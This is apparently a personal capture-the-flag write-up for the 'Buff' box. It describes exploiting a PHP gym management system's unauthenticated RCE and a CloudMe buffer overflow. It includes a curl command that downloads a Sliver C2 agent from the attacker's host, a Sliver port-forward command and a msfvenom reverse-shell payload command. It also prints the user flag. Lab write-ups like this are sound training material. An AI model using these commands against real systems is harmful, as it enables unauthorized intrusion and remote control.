Buff - Writeup - PRIVESC - Konstantinovitz

## Recon ### Website - 8080 HTTP **Server:** Apache/2.4.43 **Language:** PHP/7.46 **Package Vendor:** https://projectworlds.in/php-projects/gym-management-system-project-in-php/ ![[Pasted image 20250217172052.png]] ![[Pasted image 20250217172103.png]] From the projectworlds.in website: ![[Pasted image 20250217172318.png]] - attempted default credentials, no love ## Initial Access During our enumeration we discover the following [https://www.exploit-db.com/exploits/48506](unauthenticated RCE exploit). ```sh ╭─[λ]-[~/targets/buff/initial-access/exploit]-[10.10.10.198] ╰─> ./bin/python ./exploit.py http://$RHOST:8080/ /\ /vvvvvvvvvvvv \--------------------------------------, `^^^^^^^^^^^^ /============BOKU=====================" \/ [+] Successfully connected to webshell. ``` The shell is acting rather funky, so I'll proceed to: - generate a [[Sliver C2]] agent - serve it using `sudo python3 -m http.server 8000` - download it from the reverse shell: `curl http://10.10.14.11:8000/MIGHTY_RANK.exe -o agent.exe` - and finally execute it: `.\agent.exe` Once we're up and running I'll go ahead and grab the user flag: ``` cat C:\Users\shaun\Desktop\user.txt 876f379fd681c53338e59326d5d4e284 ``` Solved this part in bout 30 minutes. ## Privesc - running [[Winpeas]] yields nothing of interest - credential hunting reveals a few database related password strings, but this approach is ultimately unfruitful and took waaaay to much of my time. - I have a gander at dumping the database and parsing it for sensitive data, nothig, again, ended up wasting a ton of time here rather than pivoting. ### Interesting Binaries - CloudMe - Had to take a hint here which suggested to search through `C:\Users\shaun\` home directory for an interesting binary. ```powershell Get-ChildItem -Path "C:\Users\shaun\" -Recurse -Include *.exe, *.txt Directory: C:\Users\shaun\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 17/02/2025 15:57 34 user.txt -a---- 17/02/2025 16:55 10141184 winpeas.exe Directory: C:\Users\shaun\Downloads Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 16/06/2020 16:26 17830824 CloudMe_1112.exe ``` A quick google search of `CloudMe_1112.exe` reveals https://www.exploit-db.com/exploits/48389 all the exploits are written in python.... which complicates things as there's no python runtime installed on the system.... The service opens up port `:8888` on the `localhost` network interface, meanwhile all the available exploits are written assuming in python assuming that we are executing them from our attacker machine. ```powershell # start the binary C:\users\shaun\downloads\cloudme_1112.exe # verify port bind netsat -ano | findstr :8888 TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 5012 ``` This means that we will need to perform some port forwarding which may be achieved using sliver c2s built in port forwarding functionality: ```sliver portfwd add --bind 0.0.0.0:8888 --remote 0.0.0.0:8888 ``` Performing a quick test of the connection from our attacker machine: ```sh nc -vz 127.0.0.1 8888 Connection to 127.0.0.1 8888 port [tcp/*] succeeded! ``` We generate a payload using [[zettelkasten/msfvenom|msfvenom]]: ``` msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 -b '\x00\x0A\x0D' -f python ``` Paste that shit into the `privesc/exploit.py` file, aaaaand execute. And that's it... ## Lessons Learned Got stuck chasing red herrings for the privesc, got tunnel visioned on credential hunting and database dumping. When I took a hint and realized that I should have looked in the `Downloads` folder I felt rather silly. I quickly identified the remaining privesc but got stuck for a really long time panicking and being unable to make port forwarding work as intended. Time eventually ran out. Remedied the whole ordeal by writing a better cheatsheet/documentation for [[Pivoting and Port Forwarding]]. Furthermore I learned about [[DBeaver-TODO]] and got a lot better at credential hunting etc.